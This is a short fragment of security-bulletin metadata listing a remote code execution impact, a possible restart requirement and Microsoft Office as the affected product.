Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Office

//